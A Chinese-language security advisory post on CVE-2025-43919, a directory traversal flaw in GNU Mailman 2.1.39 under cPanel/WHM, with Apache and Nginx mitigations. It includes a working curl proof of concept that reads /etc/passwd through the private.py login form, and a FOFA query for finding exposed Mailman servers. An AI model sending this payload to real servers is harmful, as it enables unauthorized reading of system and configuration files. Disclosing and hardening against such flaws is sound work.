在随 cPanel/WHM 捆绑发布的 GNU Mailman 2.1.39 中发现了一个新漏洞,允许未经身份验证的远程攻击者通过目录遍历缺陷读取服务器上的任意文件。
📌 漏洞摘要:
目录遍历(未认证)private.py CGI 脚本/mailman/private/mailman/etc/passwd、.mbox 存档和 Mailman 配置文件等文件5.8(中危)CVE-2025-43919状态:尚无官方补丁(Mailman 2.1.x 已停止维护)
🔥 概念验证:
curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." \
http://target/mailman/private/mailman
🧨 利用场景:
/etc/passwd、配置文件或邮箱文件🛡️ 缓解措施:
在 Web 服务器层面阻止对 /mailman/private 的访问:
<Location "/mailman/private">
Require ip 127.0.0.1
Deny from all
</Location>
或在 Nginx 中:
location /mailman/private {
deny all;
return 403;
}
⬆️ 迁移到 Mailman 3.x —— 2.x 已停止维护,且缺乏现代防护
🔍 FOFA 查询:app="Mailman"
📚 了解更多,负责任地分享,并确保你的基础设施安全。
🔒 关注以获取更多真实世界的 CVE、PoC 和加固技巧: 👉 @cybersecplayground
#bugbounty #infosec #exploit #pentest #cve2025 #directorytraversal #linuxsecurity